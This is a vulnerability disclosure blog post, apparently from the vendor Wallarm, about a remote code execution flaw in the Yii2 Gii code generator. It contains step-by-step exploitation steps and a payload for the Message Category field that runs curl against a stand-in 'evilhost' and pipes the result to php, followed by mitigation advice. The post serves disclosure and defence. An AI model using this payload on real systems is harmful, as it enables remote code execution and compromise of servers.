This article is written specifically for web developers who use a module. We will tell you how we got access to sensitive data on a staging server through Yii2 Gii Remote Code: First to the testing environment, and then to the production. Spoiler: We have notified the module developer about the problem and it will be fixed soon. A temporary patch is available on GitHub.

Ā 

Gii is a module used to automatically generate code that implements some common website features: https://yiiframework.com.ua/ru/doc/guide/2/start-gii/

Ā 

Let's get started.

Ā 

The packages we use:Ā 

"yiisoft/yii2-debug": "~2.1.0",
       "yiisoft/yii2-gii": "^2.2",
       "yiisoft/yii2-faker": "~2.0.0",

Yii2 Framework 2.0.35

Ā 

You can find Gii at the addresses like:

https://localhost/index.php?r=gii%2Fdefault%2Findex
https://localhost/gii/

To successfully exploit the vulnerability, go to the Model Generator section.

The application must have a database configured, otherwise the model cannot be generated.Ā 

Also, you must specify the existing table name in the Table Name field.Ā 

The remaining fields can be filled arbitrarily up to the Enable I18N checkbox.

Once you select it, the Message Category field appears.

That's exactly where the vulnerability is hidden:

aaa', 'a'),];}}system('curl https://evilhost/b|php');__halt_compiler();

Click Preview, then click Generate. The answer should be:

The code has been generated successfully.

And next there will be data on successful generation, including a path to the model.

The vulnerability exists due to insufficient filtering of incoming parameters in the generateString function of the yiisoft/yii2-gii/src/Generator.php#L505 file. The $ this->messageCategory parameter is not filtered and allows you to embed arbitrary php code into the model file.

Here is an example file with embedded php code:

To execute arbitrary code, you need to enter the created model it in the Model Class field of the Form Generator section. This vulnerability can be exploited in any type of code generation with the Enable I18N option available.

Since the vulnerability still exists, those who use the Yii2 Gii Remote Code module need to check the following:

  1. Make sure that access to the developer's platform is closed: There should be no alpha/beta or other versions, and the development environment should not be open to external access.
  2. To patch the vulnerability, you should use the recommendations described by the module“s developer here https://github.com/yiisoft/yii2-gii/issues/433.
  3. Furthermore, we encourage you to install the Web Application Firewall which will fix such vulnerabilities and ensure the security of your web applications.

We would also like to note that developers should not underestimate access to their staging server, as it can help attackers gain access to their resources.

Start your Wallarm WAF trial for free today: sales@wallarm.ru

Recent Posts

CISO Spotlight: Dimitris Georgiou on Building Security that Serves People First

Dimitris Georgiou has been a self-professed computer geek since the early 80s. At university, he…

5 days ago

The CISO’s Dilemma: How To Scale AI Securely

Your board wants AI. Your developers are building with it. Your budget committee is asking…

3 weeks ago

Agent-to-Agent Attacks Are Coming: What API Security Teaches Us About Securing AI Systems

AI systems are no longer just isolated models responding to human prompts.  In modern production…

3 weeks ago

Everyone Knows About Broken Authorization – So Why Does It Still Work for Attackers?

Broken authorization is one of the most widely known API vulnerabilities.  It features in the…

1 month ago

From Shadow APIs to Shadow AI: How the API Threat Model Is Expanding Faster Than Most Defenses

The shadow technology problem is getting worse.  Over the past few years, organizations have scaled…

1 month ago

Inside Modern API Attacks: What We Learn from the 2026 API ThreatStats Report

API security has been a growing concern for years. However, while it was always seen…

2 months ago